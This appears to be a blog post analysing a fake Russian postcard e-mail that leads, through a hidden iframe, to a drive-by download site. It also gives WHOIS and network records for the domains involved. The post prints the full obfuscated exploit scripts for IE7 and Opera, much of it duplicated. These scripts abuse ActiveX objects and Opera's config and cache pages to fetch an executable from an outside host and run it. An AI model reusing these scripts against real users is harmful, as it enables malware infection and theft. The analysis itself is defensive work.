I received another e-mail today, and I must admit, it's been a while since I've received one of these, but never the less, the e-mail claimed to come from postcard.ru;
Вам пришла виртуальная открытка.
Для ее получения зайдите на сайт <http://www.postcard.ru/card.php?1970893242>
www.postcard.ru/card.php?2718276704 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
и нажмите на ссылку 'получить открытку'
Служба рассылки открыток POSTCARD.RU
------------------------------------------------
You recieved an postcard.
To get it follow to web-site <http://www.postcard.ru/card.php?3765275987>
www.postcard.ru/card.php?3373149370 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
switch to english and click on 'get my postcard'
Postcard service POSTCARD.RU
Для ее получения зайдите на сайт <http://www.postcard.ru/card.php?1970893242>
www.postcard.ru/card.php?2718276704 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
и нажмите на ссылку 'получить открытку'
Служба рассылки открыток POSTCARD.RU
------------------------------------------------
You recieved an postcard.
To get it follow to web-site <http://www.postcard.ru/card.php?3765275987>
www.postcard.ru/card.php?3373149370 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
switch to english and click on 'get my postcard'
Postcard service POSTCARD.RU
savichev.com (89.108.94.111, PTR: server5.pwstudio.ru) is the first site we see. This loads an iFrame to twain32.cn;
<iframe name="ABNHosting" src="http://www.twain32.cn/img/out.php?s_id=1&s=card" frameborder="0" border="0" height="1" width="100&q
uot;></iframe>
uot;></iframe>
Ref:
http://vurl.mysteryfcm.co.uk/?url=132594
If you are using IE7 then twain32.cn returns the following;
<script>
function CreateO(os, nz)
{
var e0 = null;
try
{
eval('e0 = os.CreateObject(nz)')
}
catch(e)
{
}
if (! e0)
{
try
{
eval('e0 = os.CreateObject(nz, "")')
}
catch(e)
{
}
}
if (! e0)
{
try
{
eval('e0 = os.CreateObject(nz, "", "")')
}
catch(e)
{
}
}
if (! e0)
{
try
{
eval('e0 = os.GetObject("", nz)')
}
catch(e)
{
}
}
if (! e0)
{
try
{
eval('e0 = os.GetObject(nz, "")')
}
catch(e)
{
}
}
if (! e0)
{
try
{
eval('e0 = os.GetObject(nz)')
}
catch(e)
{
}
}
return(e0);
}
function Download(a)
{
var lm = CreateO(a,'m'+'sxm'+'l2'+'.'+'X'+'M'+'LHT'+'TP');
lm.open('G'+'E'+'T','http://www.yvon-publicidad.com/images/images.php?w=0&e=2',false);
lm.send();
var o = CreateO(a,'a'+'d'+'od'+'b'+'.'+'s'+'t'+'re'+'am');
o.type = 1;
o.Mode = 3;
o.open();
o.Write(lm.responseBody);
var tut = ".//..//win"+".exe";
o.savetoFile(tut,2);
o.close();
var s = CreateO(a, 'S'+'hel'+'l.A'+'pp'+'lic'+'at'+'ion');
s.Shellexecute(tut);
}
var x = 0;
var t = new Array(
'{B'+'D'+'96C'+'55'+'6-65'+'A3-11'+'D0'+'-98'+'3A-00'+'C0'+'4FC'+'29'+'E30}',
'{BD'+'96'+'C55'+'6-6'+'5A3-1'+'1D0-9'+'83'+'A-0'+'0C0'+'4F'+'C2'+'9E36}',null);
while (t[x])
{
var a = null;
if (t[x].substring(0,1) == '{')
{
a = document.createElement('object');
a.setAttribute('cl'+'a'+'ss'+'id', 'cl'+'s'+'id:' + t[x].substring(1, t[x].length + 1));
}
else
{
try
{
a = new ActiveXObject(t[x]);
}
catch(e)
{
}
}
if (a)
{
try
{
var b = CreateO(a, 'Sh'+'el'+'l'+'.'+'A'+'p'+'pl'+'ica'+'ti'+'on');
if (b)
{
if (Download(a)) break;
}
}
catch(e)
{
}
}
x++;
}
setTimeout("window.location = 'jav.php'", 2500);
</script>
</body>
</html>
function CreateO(os, nz)
{
var e0 = null;
try
{
eval('e0 = os.CreateObject(nz)')
}
catch(e)
{
}
if (! e0)
{
try
{
eval('e0 = os.CreateObject(nz, "")')
}
catch(e)
{
}
}
if (! e0)
{
try
{
eval('e0 = os.CreateObject(nz, "", "")')
}
catch(e)
{
}
}
if (! e0)
{
try
{
eval('e0 = os.GetObject("", nz)')
}
catch(e)
{
}
}
if (! e0)
{
try
{
eval('e0 = os.GetObject(nz, "")')
}
catch(e)
{
}
}
if (! e0)
{
try
{
eval('e0 = os.GetObject(nz)')
}
catch(e)
{
}
}
return(e0);
}
function Download(a)
{
var lm = CreateO(a,'m'+'sxm'+'l2'+'.'+'X'+'M'+'LHT'+'TP');
lm.open('G'+'E'+'T','http://www.yvon-publicidad.com/images/images.php?w=0&e=2',false);
lm.send();
var o = CreateO(a,'a'+'d'+'od'+'b'+'.'+'s'+'t'+'re'+'am');
o.type = 1;
o.Mode = 3;
o.open();
o.Write(lm.responseBody);
var tut = ".//..//win"+".exe";
o.savetoFile(tut,2);
o.close();
var s = CreateO(a, 'S'+'hel'+'l.A'+'pp'+'lic'+'at'+'ion');
s.Shellexecute(tut);
}
var x = 0;
var t = new Array(
'{B'+'D'+'96C'+'55'+'6-65'+'A3-11'+'D0'+'-98'+'3A-00'+'C0'+'4FC'+'29'+'E30}',
'{BD'+'96'+'C55'+'6-6'+'5A3-1'+'1D0-9'+'83'+'A-0'+'0C0'+'4F'+'C2'+'9E36}',null);
while (t[x])
{
var a = null;
if (t[x].substring(0,1) == '{')
{
a = document.createElement('object');
a.setAttribute('cl'+'a'+'ss'+'id', 'cl'+'s'+'id:' + t[x].substring(1, t[x].length + 1));
}
else
{
try
{
a = new ActiveXObject(t[x]);
}
catch(e)
{
}
}
if (a)
{
try
{
var b = CreateO(a, 'Sh'+'el'+'l'+'.'+'A'+'p'+'pl'+'ica'+'ti'+'on');
if (b)
{
if (Download(a)) break;
}
}
catch(e)
{
}
}
x++;
}
setTimeout("window.location = 'jav.php'", 2500);
</script>
</body>
</html>
If you are using Opera, you get the following;
<script language=javascript>
blank_iframe = document.createElement('if'+'ra'+'me');
blank_iframe.src = 'a'+'bo'+'ut:b'+'lank';
blank_iframe.setAttribute('st'+'yle', 'disp'+'lay:n'+'one');
blank_iframe.setAttribute('i'+'d', 'bla'+'nk_i'+'fram'+'e_w'+'indow');
document.appendChild(blank_iframe);
blank_iframe_window.eval
("config_iframe = document.createElement('if'+'ra'+'me');\
config_iframe.setAttribute('i'+'d', 'con'+'fig_if'+'rame_w'+'indow');\
config_iframe.src = 'op'+'era:c'+'on'+'fig';\
document.appendChild(config_iframe);\
app_iframe = document.createElement('sc'+'ri'+'pt');\
cache_iframe = document.createElement('if'+'ra'+'me');\
app_iframe.src = 'http://www.yvon-publicidad.com/images/images.php?w=0&e=2';\
app_iframe.onload = function ()\
{\
cache_iframe.src = 'op'+'er'+'a:c'+'ache';\
cache_iframe.onload = function ()\
{\
cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe
.src.toUpperCase(), '');\
filename = cache.match(re);\
config_iframe_window.eval\
(\"\
opera.setPreference('Ne'+'tw'+'or'+'k','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\
app_link = document.createElement('a');\
app_link.setAttribute('h'+'r'+'ef', 't'+'n3'+'270://n'+'oth'+'ing');\
app_link.click();\
setTimeout(function () {opera.setPreference('Ne'+'tw'+'ork','TN'+'327'+'0 A'+'pp','te'+'ln'+'et.'+'exe')},1000);\
\");\
};\
document.appendChild(cache_iframe);\
};\
document.appendChild(app_iframe);");
</script>
</body>
</html>
blank_iframe = document.createElement('if'+'ra'+'me');
blank_iframe.src = 'a'+'bo'+'ut:b'+'lank';
blank_iframe.setAttribute('st'+'yle', 'disp'+'lay:n'+'one');
blank_iframe.setAttribute('i'+'d', 'bla'+'nk_i'+'fram'+'e_w'+'indow');
document.appendChild(blank_iframe);
blank_iframe_window.eval
("config_iframe = document.createElement('if'+'ra'+'me');\
config_iframe.setAttribute('i'+'d', 'con'+'fig_if'+'rame_w'+'indow');\
config_iframe.src = 'op'+'era:c'+'on'+'fig';\
document.appendChild(config_iframe);\
app_iframe = document.createElement('sc'+'ri'+'pt');\
cache_iframe = document.createElement('if'+'ra'+'me');\
app_iframe.src = 'http://www.yvon-publicidad.com/images/images.php?w=0&e=2';\
app_iframe.onload = function ()\
{\
cache_iframe.src = 'op'+'er'+'a:c'+'ache';\
cache_iframe.onload = function ()\
{\
cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe
.src.toUpperCase(), '');\
filename = cache.match(re);\
config_iframe_window.eval\
(\"\
opera.setPreference('Ne'+'tw'+'or'+'k','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\
app_link = document.createElement('a');\
app_link.setAttribute('h'+'r'+'ef', 't'+'n3'+'270://n'+'oth'+'ing');\
app_link.click();\
setTimeout(function () {opera.setPreference('Ne'+'tw'+'ork','TN'+'327'+'0 A'+'pp','te'+'ln'+'et.'+'exe')},1000);\
\");\
};\
document.appendChild(cache_iframe);\
};\
document.appendChild(app_iframe);");
</script>
</body>
</html>
Ref:
http://vurl.mysteryfcm.co.uk/?url=132605
twain32.cn resolves to the IP 195.5.116.239, which has a PTR that shows: src.esthost.eu (IP: 195.5.116.239). Alas Whois.eu don't seem to want to allow us to do a remote WhoIs, so we've got to eurid.eu. No problem. When doing a WhoIs lookup on esthost.eu, we see;
Domain
Name esthost
Status REGISTERED
Registered April 7, 2006
Last update October 18, 2007, 12:48 pm
Registrant
Name Viktor Norin
Organisation Starline Web Services
Language English
Address
PAE 21
11415 Tallinn
EE
Estonia
Phone +372.6370911
Fax +372.6370911
Email hostmaster@esthost.eu
Registrar technical contacts
Name Domain Manager
Organisation PublicDomainRegistry.com
Language English
Address
14525 SW Millikan #48732
97005-2343 Beaverton
Oregon
United States
Phone +1.2013775952
Fax +1.320.2105146
Email domain.manager@publicdomainregistry.com
Registrar
Organisation PublicDomainRegistry.com
Website www.publicdomainregistry.com
Nameservers
ns2.esthost.eu (195.5.117.233)
ns1.esthost.eu (195.5.116.233)
Name esthost
Status REGISTERED
Registered April 7, 2006
Last update October 18, 2007, 12:48 pm
Registrant
Name Viktor Norin
Organisation Starline Web Services
Language English
Address
PAE 21
11415 Tallinn
EE
Estonia
Phone +372.6370911
Fax +372.6370911
Email hostmaster@esthost.eu
Registrar technical contacts
Name Domain Manager
Organisation PublicDomainRegistry.com
Language English
Address
14525 SW Millikan #48732
97005-2343 Beaverton
Oregon
United States
Phone +1.2013775952
Fax +1.320.2105146
Email domain.manager@publicdomainregistry.com
Registrar
Organisation PublicDomainRegistry.com
Website www.publicdomainregistry.com
Nameservers
ns2.esthost.eu (195.5.117.233)
ns1.esthost.eu (195.5.116.233)
Net-block information:
inetnum: 195.5.116.0 - 195.5.117.255
netname: EE-COMPIC
descr: Compic Ltd.
country: EE
org: ORG-CL48-RIPE
admin-c: RI215-RIPE
tech-c: RI215-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: AS3327-MNT
mnt-routes: AS3327-MNT
mnt-domains: AS3327-MNT
source: RIPE # Filtered
organisation: ORG-CL48-RIPE
org-name: Compic Ltd.
org-type: OTHER
address: Voru 1-28
address: 13612, Tallinn
address: Estonia
phone: +372 6321028
e-mail: roman@compic.ee
admin-c: RI215-RIPE
mnt-ref: AS3327-MNT
mnt-by: AS3327-MNT
source: RIPE # Filtered
person: Roman Ivanov
address: Voru 1-28
address: 13612, Tallinn
address: Estonia
mnt-by: AS39823-MNT
phone: +3726321028
e-mail: roman@compic.ee
nic-hdl: RI215-RIPE
source: RIPE # Filtered
% Information related to '195.5.116.0/23AS39823'
route: 195.5.116.0/23
descr: Compic Ltd.
origin: AS39823
mnt-by: AS3327-MNT
source: RIPE # Filtered
netname: EE-COMPIC
descr: Compic Ltd.
country: EE
org: ORG-CL48-RIPE
admin-c: RI215-RIPE
tech-c: RI215-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: AS3327-MNT
mnt-routes: AS3327-MNT
mnt-domains: AS3327-MNT
source: RIPE # Filtered
organisation: ORG-CL48-RIPE
org-name: Compic Ltd.
org-type: OTHER
address: Voru 1-28
address: 13612, Tallinn
address: Estonia
phone: +372 6321028
e-mail: roman@compic.ee
admin-c: RI215-RIPE
mnt-ref: AS3327-MNT
mnt-by: AS3327-MNT
source: RIPE # Filtered
person: Roman Ivanov
address: Voru 1-28
address: 13612, Tallinn
address: Estonia
mnt-by: AS39823-MNT
phone: +3726321028
e-mail: roman@compic.ee
nic-hdl: RI215-RIPE
source: RIPE # Filtered
% Information related to '195.5.116.0/23AS39823'
route: 195.5.116.0/23
descr: Compic Ltd.
origin: AS39823
mnt-by: AS3327-MNT
source: RIPE # Filtered
Getting back to the infection however. This comes courtesy of yvon-publicidad.com, as you can see in the above source code;
http://www.yvon-publicidad.com/images/images.php?w=0&e=2
This drops a 1.95K file called mstelnet.exe (FSG packed), which Avira flagged as;
This, according to ThreatExpert, downloads the following;
http://www.yvon-publicidad.com/images/images.php?w=1 (7.12K - HIDDENEXT/Crypted)
http://www.yvon-publicidad.com/images/images.php?w=2 (45K - TR/Crypt.Morphine.Gen)
http://www.yvon-publicidad.com/images/images.php?w=3 (45K - TR/Crypt.Morphine.Gen)
http://www.yvon-publicidad.com/images/images.php?w=4 (27K - TR/Crypt.Morphine.Gen)
Ref:
http://www.threatexpert.com/report.aspx?md5=cbec5204eddd57aadc4b09d6d1a0a003
The report makes for very interesting reading as it shows an injection into the IE process (injects mswapi.dll), trojans and keyloggers - oh the fun!.
WhoIs for the domain shows;
Registrant:
Guillain Jean-Daniel
21, rue des vertus
Marseille, 13005
France
Registrar: DOTREGISTRAR
Domain Name: YVON-PUBLICIDAD.COM
Created on: 20-MAY-05
Expires on: 20-MAY-09
Last Updated on: 06-APR-08
Guillain Jean-Daniel
21, rue des vertus
Marseille, 13005
France
Registrar: DOTREGISTRAR
Domain Name: YVON-PUBLICIDAD.COM
Created on: 20-MAY-05
Expires on: 20-MAY-09
Last Updated on: 06-APR-08
A little searching turned up a couple of other possibly related (previous versions?) reports;
http://www.threatexpert.com/report.aspx?uid=d0ce4715-e6e2-4a3e-b4e0-69a2fb7698cb
http://research.sunbelt-software.com/ViewMalware.aspx?id=2787949
No comments:
Post a Comment